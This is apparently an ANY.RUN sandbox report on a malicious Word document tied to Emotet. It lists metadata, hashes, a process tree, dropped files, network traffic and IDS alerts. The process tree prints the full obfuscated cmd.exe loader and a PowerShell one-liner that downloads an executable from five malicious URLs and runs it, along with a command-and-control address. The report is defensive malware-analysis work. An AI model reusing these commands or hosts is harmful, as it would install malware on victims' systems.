File name: | Untitled-NGC-W88319.doc |
Full analysis: | https://app.any.run/tasks/73e58bea-b6f9-4f65-830b-34386feb7b99 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 07:33:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Gavin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 05:31:00 2018, Last Saved Time/Date: Wed Nov 14 05:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | CD1D6DE81B418AD59016BAB856B2ACAE |
SHA1: | 2CD4915B0D081373CE0968589AEAD6234343F8E7 |
SHA256: | 75C5359E2478B45A7526CF7ECEFBEA5C15D3C3BCDDBA32A40EF07D0CC0AC368D |
SSDEEP: | 1536:qjkqGO5ocn1kp59gxBK85fBt+a9Sy4z4He519y9ZjFz4AZUEZ:P41k/W48uz4He519y9ZjFz4AZUc |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:14 05:31:00 |
CreateDate: | 2018:11:14 05:31:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Gavin |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3136 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-NGC-W88319.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3636 | cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,^4^1,6^9,^60,^5^0,5^2,^5^0^,6^9^,^68,6^9,^7,52,^1^4^,1^8,51^,^3^,51,0^,^1^8^,5^2^,^34^,^13,4^3,4^6^,^38,6^2,5^1,5^1,^32,^70,^3^,3,51,^6^0,^6^9,7,68^,^4^0^,^69,4^1,^3^2,^2^,7^,^58^,1^4^,^50^,5^2^,^41^,3^,36^,5^4,4^0,^39,^8,^48,0^,5^9^,19,38,^6^2^,51^,5^1,^3^2^,^70^,^3^,^3,^4^1,2,1^0,6^9^,^7^,66,^6^9,^6^8,7^1^,^68^,3^6,^6^0,^21,^1^8^,5^0^,18^,^52^,6^8^,69,7^1,^69,40,^69^,^14^,50^,52,4^1,^3,^12^,^2^1^,44^,^3^2^,^37,^1^3,^10,1^8,50^,6^,^1^5^,14^,^4^3^,^32^,40,18,^5^1^,^2^5,^1^5^,^38,1^5^,3^5,47^,31^,^48,^67^,^60,6^5,^25^,4^,^43,71,^68^,^5^1,3^6^,^41^,^14^,6^1^,^5^9,1^4^,^20^,^69^,^5^1^,^62,^4^5,^70^,70^,^22,^36^,^51,3^7^,36^,^41,^3^2,20^,^6^9^,^5^1^,6^2^,2^5,^3^5^,3^0^,^1^5^,2^9,^39^,5^,7,^1^4^,^3^6^,2^4,36,^1^5^,3^5,4^7,^31,^5^0,50^,8^,2^7,6^5^,1^6^,3^6^,42^,2^8^,^5^9,2^6,46,^36,^5^0^,^51^,^27^,2^8,5^0,5^2^,^4^1^,^27,^1^5^,^4^1,68,2^4,^4^1^,40,^54,14^,24,41^,^40,^6^2,51,51,^32,^1^5^,4^7,3^1,32,^1^7^,^37^,2^7,65^,^27,^1^6^,36^,^4^2^,^28,5^9,^26^,46,^36^,5^0,^51,^27^,^28,^50,^52,41,2^7,^15^,^6^9,^1^0^,^52^,1^0,26^,^1^4,68,51,^60^,^3^6,6^9^,^4^1,15^,^47^,^9^,^5^2,^6^0^,^36^,^69^,50^,^6^2^,25^,3^1^,^26,3^2,67^,2^7,^1^8,^7,2^7,31^,^18^,8^,^0^,3^5^,57^,^5^1^,^60,71^,^57^,31,^5^0^,^50^,8,1^4^,^5^2^,3^2,3^6,7,^2^5,^15^,^2^2,64,3^7,1^5,49,^3^1,26^,^32,^67^,^49^,1^,35^,^4^7^,^31,50^,50^,8,^14,68,36^,7,1^0,2^5^,^35,47,3^1^,32,^1^7^,^37^,^1^4,^52,3^2,^3^6,7,^25,^35,^47,31^,3^2^,17,3^7^,14^,^5^1,^71^,^3^2,^36,^27^,6^5,^27^,^56,47,^3^1^,^3^2,^1^7,^37,^1^4^,4^2^,60,^1^8,^51^,^36^,^25,3^1,^50,^5^0,8^,14,60^,36,^6^8,32,52^,7^,6^8^,^3^6^,3^3^,^52^,^10^,^71,35,4^7^,31^,^32^,1^7,^3^7^,14,6^8^,^6^9^,^2^1,^36^,51^,5^2,^9^,1^8,^4^0^,^36,^2^5,^31,48,67,^60^,3^5^,^4^7^,4^3^,51^,69^,^60^,5^1,^28,2^0^,60,52^,^5^0,36,68^,^6^8^,^27^,3^1^,^4^8,6^7^,6^0^,4^7^,26^,6^0^,36^,69^,13,^23,5^0,6^9,^5^1,^50^,^6^2,5^7^,^23,2^3,27^,^2^7^,^27,^2^7,^27,27^,2^7^,^2^7,27^,^27^,2^7^,^2^7^,^27,2^7^,^2^7^,^2^7^,^27,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3316 | powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');$qWr=([System.IO.Path]::GetTempPath()+'\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1620 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2488 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | JZn.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
976 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | JZn.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2400 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DD1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POV7N2GUO57ZVRFKIIA1.temp | — | |
MD5:— | SHA256:— | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9BE5DDDB2A1E7DBDC5967DE15F0CCE53 | SHA256:B91AC8E126B954B0D8A8D101EF890DEEA64F635C0A14EF731869A6313C124F70 | |||
2488 | JZn.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:D984329D7732DA39DE1085AC9CDCB428 | SHA256:10339B0CC22729340F8E538735D29B8839FE325BB8D4F70A33026765DD7F71B2 | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183a54.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3316 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JZn.exe | executable | |
MD5:D984329D7732DA39DE1085AC9CDCB428 | SHA256:10339B0CC22729340F8E538735D29B8839FE325BB8D4F70A33026765DD7F71B2 | |||
3136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$titled-NGC-W88319.doc | pgc | |
MD5:AD0F60A5E58E4E5064EB7E1B4294AF4E | SHA256:09D091CC46FC7DE6E7C9F3537A26E386D4F1A064CB7A23485C6FB698044E4DF2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2400 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
3316 | powershell.exe | GET | 200 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH/ | VN | executable | 448 Kb | malicious |
3316 | powershell.exe | GET | 301 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH | VN | html | 617 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3316 | powershell.exe | 45.252.248.22:80 | stud100.biz | AZDIGI Corporation | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
stud100.biz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3316 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3316 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3316 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
3316 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
3316 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |